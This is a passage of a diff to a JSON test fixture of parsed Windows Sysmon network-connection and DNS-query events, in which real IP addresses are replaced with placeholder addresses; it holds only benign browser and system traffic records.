Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, @@ -3198,7 +3198,7 @@ "Image": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "SourceIsIpv6": "false", "SourcePort": "1139", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "DestinationPort": "443", "UtcTime": "2019-03-18 16:57:48.214", "ProcessGuid": "{42f11c3b-ccaa-5c8f-0000-0010b4e22700}" @@ -3224,7 +3224,7 @@ "event_data": { "QueryName": "ocsp.int-x3.letsencrypt.org", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;", + "QueryResults": "type: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.468", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -3241,7 +3241,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3254,7 +3254,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -3277,7 +3277,7 @@ "ProcessId": "2736", "QueryName": "ocsp.pki.goog", "QueryStatus": "0", - "QueryResults": "type: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.581" }, @@ -3355,7 +3355,7 @@ "ProcessId": "2736", "QueryName": "googleads4.g.doubleclick.net", "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.872", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -3376,7 +3376,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3457,7 +3457,7 @@ "ProcessId": "2736", "QueryName": "images.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;", + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -3476,7 +3476,7 @@ "version": 5 }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -3538,7 +3538,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:4300:6800:7200:6f00:6d00:6500\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3560,12 +3560,12 @@ "UtcTime": "2019-03-18 16:57:48.250", "User": "NT AUTHORITY\\NETWORK SERVICE", "Image": "C:\\Windows\\System32\\svchost.exe", - "SourceIp": "a00:20f:0:0:18a2:6e00:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPort": "5355", "DestinationPortName": "llmnr", "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", "ProcessId": "924", - "DestinationIp": "e000:fc:4300:6800:7200:6f00:6d00:6500", + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "SourceIsIpv6": "true", "SourcePort": "55542", "Initiated": "true", @@ -3587,7 +3587,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData 